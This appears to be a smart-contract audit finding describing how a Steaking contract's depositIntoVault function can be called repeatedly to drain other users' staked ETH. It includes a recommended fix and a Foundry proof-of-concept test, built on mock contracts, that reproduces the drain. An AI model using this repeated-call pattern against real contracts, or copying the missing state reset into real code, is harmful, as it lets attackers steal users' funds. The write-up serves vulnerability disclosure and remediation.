Tags: Beginner Friendly, Foundry, DeFi
100 EXP
Submission Details
Severity: high
Valid

The depositIntoVault function can be called by the same user more than once

Summary

The depositIntoVault() function can be called repeatedly by the same user because it never clears the caller's recorded stake. Each extra call converts other users' ETH into shares for the caller, so those users lose the vault shares they were entitled to.

Vulnerability Details

depositIntoVault() wraps the caller's staked ETH into WETH and deposits it into the Steak Vault, but it never resets the caller's stakedAmount (usersToStakes[msg.sender]) to 0.

Because the function leaves the caller's stake untouched, the contract state is the same after the call as before it. A user can therefore call the function again and receive the same amount of shares a second time, even though the ETH backing that second deposit was staked by someone else.

Impact

A user can abuse this function to mint more shares for themselves than their own stake is worth, for as long as the contract still holds ETH.
Each call reduces the contract's ETH balance by the caller's staked amount without reducing what the caller is allowed to deposit. Once the balance falls below another user's staked amount, that user's call to depositIntoVault reverts, so they can never receive their vault shares. The repeated calls effectively drain the contract of the ETH other users staked.

Tools Used

Manual review

Recommendations

Reset the user's staked amount to 0 before depositing into the vault. The amount must be read into a local variable first, and the storage write must happen before the external calls to WETH and the vault (checks-effects-interactions), so that a repeated call finds nothing left to deposit.

uint256 stakedAmount = usersToStakes[msg.sender];
// Clear the stake before any external call so a second call deposits nothing.
usersToStakes[msg.sender] = 0;
IWETH(WETH).deposit{value: stakedAmount}();
IWETH(WETH).approve(vault, stakedAmount);
uint256 sharesReceived = IWETHSteakVault(vault).deposit(
stakedAmount,
msg.sender
);
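The following Foundry test is an added example written for this write-up; it is not the Steaking project's code. It uses constructed stand-ins for WETH and the vault (MockWETH, MockVault, one share per wei), a hypothetical Steaking contract with a stake() function and both the vulnerable depositIntoVaultVulnerable() and the fixed depositIntoVault() (the "nothing staked" require is also hypothetical), and shows that two calls to the vulnerable function give the attacker twice their stake in shares, empty the contract, and make the other user's call revert, while the fixed function cannot be repeated.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Constructed stand-in for WETH9: only the calls the Steaking contract makes.
contract MockWETH {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;
    function deposit() external payable { balanceOf[msg.sender] += msg.value; }
    function approve(address s, uint256 a) external returns (bool) { allowance[msg.sender][s] = a; return true; }
    function transferFrom(address f, address t, uint256 a) external returns (bool) {
        allowance[f][msg.sender] -= a; balanceOf[f] -= a; balanceOf[t] += a; return true;
    }
}

// Constructed stand-in for the WETH Steak Vault: mints one share per wei deposited.
contract MockVault {
    MockWETH public immutable weth;
    mapping(address => uint256) public shares;
    constructor(MockWETH _weth) { weth = _weth; }
    function deposit(uint256 assets, address receiver) external returns (uint256) {
        weth.transferFrom(msg.sender, address(this), assets);
        shares[receiver] += assets;
        return assets;
    }
}

// Hypothetical Steaking contract carrying both the vulnerable and the fixed function.
contract Steaking {
    MockWETH public immutable weth;
    MockVault public immutable vault;
    mapping(address => uint256) public usersToStakes;
    constructor(MockWETH _weth, MockVault _vault) { weth = _weth; vault = _vault; }

    // Users stake raw ETH; the contract holds it until it is moved into the vault.
    function stake() external payable { usersToStakes[msg.sender] += msg.value; }

    // VULNERABLE: the stake is read but never zeroed, so every call deposits it again, paid with other users' ETH.
    function depositIntoVaultVulnerable() external returns (uint256) {
        uint256 stakedAmount = usersToStakes[msg.sender];
        weth.deposit{value: stakedAmount}();
        weth.approve(address(vault), stakedAmount);
        return vault.deposit(stakedAmount, msg.sender);
    }

    // FIXED: zero the stake before any external call (checks-effects-interactions).
    function depositIntoVault() external returns (uint256) {
        uint256 stakedAmount = usersToStakes[msg.sender];
        require(stakedAmount > 0, "nothing staked"); // hypothetical guard, not in the original
        usersToStakes[msg.sender] = 0;
        weth.deposit{value: stakedAmount}();
        weth.approve(address(vault), stakedAmount);
        return vault.deposit(stakedAmount, msg.sender);
    }
}

contract SteakingRepeatDepositTest is Test {
    MockWETH weth;
    MockVault vault;
    Steaking steaking;
    address attacker = makeAddr("attacker");
    address victim = makeAddr("victim");

    function setUp() public {
        weth = new MockWETH();
        vault = new MockVault(weth);
        steaking = new Steaking(weth, vault);
        vm.deal(attacker, 1 ether);
        vm.deal(victim, 1 ether);
        vm.prank(attacker);
        steaking.stake{value: 1 ether}();
        vm.prank(victim);
        steaking.stake{value: 1 ether}();
    }

    function testRepeatedCallDrainsContractAndLocksOutVictim() public {
        vm.startPrank(attacker);
        steaking.depositIntoVaultVulnerable();
        steaking.depositIntoVaultVulnerable(); // second call spends the victim's ETH
        vm.stopPrank();
        assertEq(vault.shares(attacker), 2 ether); // twice what the attacker staked
        assertEq(address(steaking).balance, 0);    // the victim's ETH is gone
        vm.prank(victim);
        vm.expectRevert(); // weth.deposit{value: 1 ether} fails: the contract holds no ETH
        steaking.depositIntoVaultVulnerable();
    }

    function testFixedFunctionCannotBeRepeated() public {
        vm.startPrank(attacker);
        steaking.depositIntoVault();
        vm.expectRevert("nothing staked");
        steaking.depositIntoVault();
        vm.stopPrank();
        assertEq(vault.shares(attacker), 1 ether);
        assertEq(address(steaking).balance, 1 ether); // the victim's stake is untouched
    }
}
```

Save the file under test/ in a Foundry project with forge-std installed and run forge test; both tests pass, the first one by reproducing the drain and the second one by showing that the state write before the external calls closes it.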
Updates

Lead Judging Commences

inallhonesty Lead Judge 11 months ago
Submission Judgement Published
Validated
Assigned finding tags:

`Steaking:depositIntoVault` fails to update the user's balance, allowing the contract to be drained by repeated calls
